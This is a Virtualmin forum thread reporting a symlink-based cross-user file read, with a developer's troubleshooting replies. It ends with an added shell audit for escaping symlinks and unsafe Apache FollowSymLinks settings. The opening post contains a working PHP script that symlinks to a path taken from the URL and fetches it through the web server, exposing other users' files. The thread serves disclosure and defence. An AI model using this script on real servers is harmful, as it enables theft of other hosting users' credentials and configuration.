Symlink User Bypass Security Issue

Dear Virtualmin team,

I found that Virtualmin on my box can have its user permissions bypassed by creating a symlink file. Put simply, user A creates a .txt file that links to a config.php file in another user's home dir, and then he can easily read it.

    $k = $_GET['c'];
    $flib = "data.txt";

    if ($k == "") {
        die;
    } else {
        unlink($flib);
        $sym = $k;
        $link = getcwd() . "/" . $flib;
        symlink($sym, $link);
        if ($k{0} == "/") {
            echo " window.location = '" . $flib . "'";
        } else {
            echo "<pre>";
            echo readlink($flib) . "\n";
            echo "Filesize: " . linkinfo($flib) . "B\n\n";
            $ddir = getcwd();
            $file2 = str_replace($DOCUMENT_ROOT, '', $ddir);
            $file2 = "http://" . $SERVER_NAME . $filee . $flib;
            $result = file_get_contents($file2);
            echo $result;
        }
    }

I'm not sure whether moving the ls and ln commands to the /root folder could fix this issue or not. Tell me more about what happens if I move those 2 commands and Virtualmin does not work properly.

Thanks, NhanCM

Status: Active

Comments

Do you mean one user can read another user's files via a symlink like this?

This shouldn't be possible, as each user's home dir is readable only by the domain's group.

@JamieCameron : Yes, one user can read all other users' dirs on my box; this attack is also called a local attack.

And I wish anyone here could fix this so that a user cannot access anything outside his/her directory folder.

Thanks,

The default settings in Virtualmin are for home directories to be non-world-readable.

What are the permissions on the target user's home directory?

-rw-r--r-- *.php for all, as default when uploading via FTP client. <<< it's the result when I try ls -la *.php

Yes, home users are jailed to their /home directory folder, and that is the default config now on my box.

Thanks,

How about the /home/targetusername directory? I'd be interested to see the permissions as shown by ls -ld /home/targetusername

-rw-r--r-- too; this is the default on the target directory.

Ok .. so if you SSH in as the user who created the symlink, can you read from it with cat ?

NO

The funny thing is that, even so, in PHP getcontent is OKAY.

    phim_moss@nltit $ cat /home/phim_moss/public_html/test/sniper4.txt
    cat: /home/phim_moss/public_html/test/sniper4.txt: Permission denied

Which PHP execution mode do you have enabled for this domain (at Server Configuration -> Website Options) ?

That's odd, as PHP scripts should execute with domain owner permissions.

If you upload a simple script in the source domain that prints the permissions it runs as, like:

<?php
system("id -a");
?>

what does it output?

uid=508(phim_moss) gid=508(phim_moss) groups=508(phim_moss) <<< the output.

Sorry for the late reply; it is now 9am in Vietnam.

Ok, so it is clearly running with domain owner permissions ...

I don't see how it could possibly access a file that you can't access from the shell. I'd have to login to your system myself as the source user to see what is going on.
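One point worth checking that the thread does not settle: the posted script does not read the symlink target through the PHP process itself, it builds an http:// URL and fetches the link through the web server, so the read is performed with the web server's privileges, not the domain owner's. The practical defences for that pattern in shared hosting are Apache's SymLinksIfOwnerMatch (instead of a bare FollowSymLinks) and a periodic scan for symlinks in a user's web root that resolve outside that user's home. The script below is an added example, not code from the thread or from the Virtualmin project. It assumes the usual /home/<user>/public_html layout, paths without whitespace, and a GNU-compatible readlink -f; the sample home tree and Apache config lines it audits are constructed inside a temporary directory.

```shell
#!/bin/sh
# Added audit example (not from the Virtualmin thread or project).
# 1) count_escaping_symlinks: finds symlinks under a web root whose
#    target resolves outside the owner's home (the pattern in the report).
# 2) check_followsymlinks: flags Apache "Options ... FollowSymLinks" lines
#    that do not use SymLinksIfOwnerMatch, so the server would follow a link
#    into another user's files.
# Assumptions: /home/<user>/public_html layout, no whitespace in paths,
# GNU-style "readlink -f".
set -eu

# Print the number of symlinks under $2 that resolve outside $1.
# Each offender is reported on stderr as "escapes: link -> target".
count_escaping_symlinks() {
    home=$(readlink -f "$1")      # canonicalise so prefix comparison is exact
    webroot=$2
    n=0
    for link in $(find "$webroot" -type l); do
        target=$(readlink -f "$link" || true)
        case "$target" in
            "$home"/*) ;;                         # inside the owner's home: fine
            *) echo "escapes: $link -> $target" >&2; n=$((n + 1)) ;;
        esac
    done
    echo "$n"
}

# Print "unsafe" if $1 contains an Options line enabling FollowSymLinks
# without SymLinksIfOwnerMatch, otherwise "ok".  "-FollowSymLinks" (disabling
# the option) is deliberately not matched.
check_followsymlinks() {
    conf=$1
    if grep -iE '^[[:space:]]*Options.*[[:space:]+]FollowSymLinks' "$conf" \
        | grep -qiv 'SymLinksIfOwnerMatch'; then
        echo unsafe
    else
        echo ok
    fi
}

# Build a constructed sample tree: alice's web root holds one symlink that
# stays inside her home and one that points into bob's home.
setup_demo() {
    demo=$(mktemp -d)
    mkdir -p "$demo/home/alice/public_html" "$demo/home/bob"
    printf 'sample secret\n' > "$demo/home/bob/config.php"
    printf 'hello\n' > "$demo/home/alice/public_html/index.html"
    ln -s "$demo/home/alice/public_html/index.html" "$demo/home/alice/public_html/self.txt"
    ln -s "$demo/home/bob/config.php" "$demo/home/alice/public_html/data.txt"
    printf 'Options Indexes FollowSymLinks\n' > "$demo/bad.conf"
    printf 'Options Indexes SymLinksIfOwnerMatch\n' > "$demo/good.conf"
    echo "$demo"
}

# Stand-alone run over the constructed tree.
demo=$(setup_demo)
echo "escaping symlinks for alice: $(count_escaping_symlinks "$demo/home/alice" "$demo/home/alice/public_html")"
echo "bad.conf:  $(check_followsymlinks "$demo/bad.conf")"
echo "good.conf: $(check_followsymlinks "$demo/good.conf")"
rm -rf "$demo"
```

On a real host, run count_escaping_symlinks for each /home/<user> against its public_html and review any "escapes:" lines; a hit is not proof of an attack (links to shared assets are common) but each one should be justified. The Apache check is only a first pass over one file; include every file that can carry an Options directive (.htaccess files with AllowOverride, per-domain virtual host files) before concluding the server is safe.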